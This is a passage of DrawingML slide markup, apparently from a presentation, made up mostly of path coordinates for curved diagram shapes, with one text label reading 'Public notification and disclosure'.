                <a:lnTo>
                  <a:pt x="3147415" y="1394129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3140583" y="1347343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3132391" y="1300759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3122828" y="1254391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3111906" y="1208278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3099612" y="1162443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3085960" y="1116939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3070936" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3054540" y="1027023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3036786" y="982687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3017672" y="938796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2997187" y="895413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2975330" y="852538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2952115" y="810234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2927540" y="768515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2901594" y="727417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2862224" y="767295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887662" y="808977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2911703" y="851255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2934322" y="894118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2955531" y="937514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2975318" y="981417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2993694" y="1025791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3010662" y="1070597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3026219" y="1115822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3040354" y="1161402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053080" y="1207312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3064395" y="1253515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074289" y="1299984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082772" y="1346682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3089833" y="1393571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3095498" y="1440611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3099739" y="1487779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102559" y="1535036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3103981" y="1582343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3103981" y="1629676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102559" y="1676984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3099739" y="1724240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3095498" y="1771408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3089833" y="1818449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082772" y="1865337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074289" y="1912035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3064395" y="1958505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053080" y="2004707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3040354" y="2050618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3026219" y="2096198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3010662" y="2141423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2993694" y="2186228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2975318" y="2230602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2955531" y="2274506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2934322" y="2317902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2911703" y="2360765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887662" y="2403043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2862224" y="2444712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2901594" y="2484590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2927540" y="2443505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2952115" y="2401786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2975330" y="2359482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2997187" y="2316607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3017672" y="2273223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3036786" y="2229332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3054540" y="2184997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3070936" y="2140229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3085960" y="2095080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3099612" y="2049576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3111906" y="2003742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3122828" y="1957628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3132391" y="1911261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3140583" y="1864677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3147415" y="1817890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3152876" y="1770964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3156966" y="1723923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159709" y="1676793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3161068" y="1629613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3161068" y="1582407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2713334" y="5315204"/>
            <a:ext cx="1496695" cy="1366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-635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Public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notif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cation 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and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disclosure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873331" y="4204245"/>
            <a:ext cx="3159760" cy="3211195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="298856" y="767295"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="259486" y="727417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233527" y="768515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208953" y="810234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185737" y="852538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163880" y="895413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143395" y="938796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124282" y="982687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106527" y="1027023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90131" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75107" y="1116939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61455" y="1162443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49161" y="1208278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38239" y="1254391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28676" y="1300759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20485" y="1347343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13652" y="1394129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8191" y="1441056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="1488097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="1535226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1582407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1629613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="1676793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4102" y="1723923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8191" y="1770964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13652" y="1817890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20485" y="1864677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28676" y="1911261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38239" y="1957628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49161" y="2003742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61455" y="2049576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75107" y="2095080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90131" y="2140229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106527" y="2184997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124282" y="2229332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143395" y="2273223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163880" y="2316607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185737" y="2359482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208953" y="2401786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233527" y="2443505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259486" y="2484590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298856" y="2444712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273405" y="2403043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="2360765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226745" y="2317902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205536" y="2274506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185750" y="2230602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167373" y="2186228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150406" y="2141423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134848" y="2096198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120713" y="2050618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107988" y="2004707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96672" y="1958505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86779" y="1912035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78295" y="1865337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71234" y="1818449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65570" y="1771408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61328" y="1724240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58508" y="1676984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57086" y="1629676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57086" y="1582343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58508" y="1535036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61328" y="1487779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65570" y="1440611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71234" y="1393571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78295" y="1346682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86779" y="1299984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96672" y="1253515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107988" y="1207312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120713" y="1161402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134848" y="1115822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150406" y="1070597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167373" y="1025791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185750" y="981417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205536" y="937514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226745" y="894118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="851255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273405" y="808977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298856" y="767295"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="1301648" y="2915374"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1254518" y="2904096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1208074" y="2891129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162342" y="2876537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1117358" y="2860344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1073137" y="2842577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1029728" y="2823260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987145" y="2802445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945451" y="2780157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904646" y="2756433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864781" y="2731300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825881" y="2704795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787984" y="2676944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751116" y="2647785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715302" y="2617343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680605" y="2585669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647014" y="2552776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614603" y="2518714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583374" y="2483497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553377" y="2447175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524637" y="2409774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497179" y="2371331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471055" y="2331859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446278" y="2291423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422884" y="2250033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400913" y="2207717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380403" y="2164537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361365" y="2120493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343852" y="2075637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327875" y="2030006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313486" y="1983613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300710" y="1936508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289585" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242468" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253288" y="1937575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265760" y="1985746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279869" y="2033193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295554" y="2079891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312813" y="2125815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331597" y="2170912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351866" y="2215159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373621" y="2258517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396798" y="2300973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421373" y="2342489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447332" y="2383028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474624" y="2422550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503224" y="2461031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533095" y="2498445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564222" y="2534755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596557" y="2569934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630085" y="2603944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="664756" y="2636748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700544" y="2668320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="737425" y="2698635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775360" y="2727642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814324" y="2755328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854290" y="2781655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="895210" y="2806598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937056" y="2830106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979817" y="2852166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023429" y="2872740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067892" y="2891790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1113155" y="2909290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1159192" y="2925203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1205979" y="2939504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1253464" y="2952153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301648" y="2963126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301648" y="2915374"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="1301648" y="247357"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1253464" y="258381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1205979" y="271068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1159192" y="285419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1113155" y="301383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067892" y="318935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023429" y="338048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979817" y="358673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937056" y="380796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="895210" y="404380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854290" y="429387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814324" y="455790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775360" y="483552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="737425" y="512648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700544" y="543039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="664756" y="574700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630085" y="607606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596557" y="641705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564222" y="676973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533095" y="713384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503224" y="750912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474624" y="789495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="447332" y="829132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421373" y="869784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396798" y="911415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373621" y="953985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351866" y="997470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331597" y="1041844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312813" y="1087069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295554" y="1133106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279869" y="1179944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265760" y="1227531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253288" y="1275829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242468" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289585" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300710" y="1276908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313486" y="1229677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327875" y="1183157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343852" y="1137386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361365" y="1092415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="380403" y="1048258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400913" y="1004951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422884" y="962520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="446278" y="921016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471055" y="880465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497179" y="840892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524637" y="802335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553377" y="764819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583374" y="728395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614603" y="693089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647026" y="658926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680605" y="625944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715302" y="594169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751116" y="563651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787984" y="534403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="825881" y="506476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864781" y="479882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904646" y="454672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945451" y="430885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987145" y="408533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1029728" y="387654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1073137" y="368287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1117358" y="350456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162342" y="334213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1208074" y="319570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1254518" y="306565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301648" y="295236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301648" y="247357"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="2446172" y="2948013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2406929" y="2908262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364714" y="2934716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321877" y="2959646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2278430" y="2983065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2234438" y="3004972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2189911" y="3025381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2144903" y="3044266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099449" y="3061639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2053577" y="3077502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2007336" y="3091865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1960765" y="3104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1913890" y="3116034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866747" y="3125863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819389" y="3134169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1771840" y="3140976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724152" y="3146260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1676336" y="3150044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1628457" y="3152305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580527" y="3153054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1532610" y="3152305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1484731" y="3150044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1436916" y="3146260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1389227" y="3140976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1341678" y="3134169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1294320" y="3125863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1247178" y="3116034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1200302" y="3104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153731" y="3091865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1107490" y="3077502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1061618" y="3061639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1016165" y="3044266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="971156" y="3025381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="926630" y="3004972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882637" y="2983065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839190" y="2959646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796353" y="2934716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754151" y="2908262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714908" y="2948013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756462" y="2974949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="798664" y="3000438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841476" y="3024454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="884872" y="3047022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928814" y="3068129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="973251" y="3087789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018159" y="3105988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1063498" y="3122726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1109243" y="3138017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155344" y="3151848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201775" y="3164230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1248486" y="3175139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295450" y="3184601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342631" y="3192615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390002" y="3199168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437500" y="3204260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485125" y="3207905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1532813" y="3210090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580527" y="3210814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1628254" y="3210090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1675942" y="3207905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1723567" y="3204260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1771065" y="3199168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1818436" y="3192615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1865617" y="3184601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1912581" y="3175139"/>
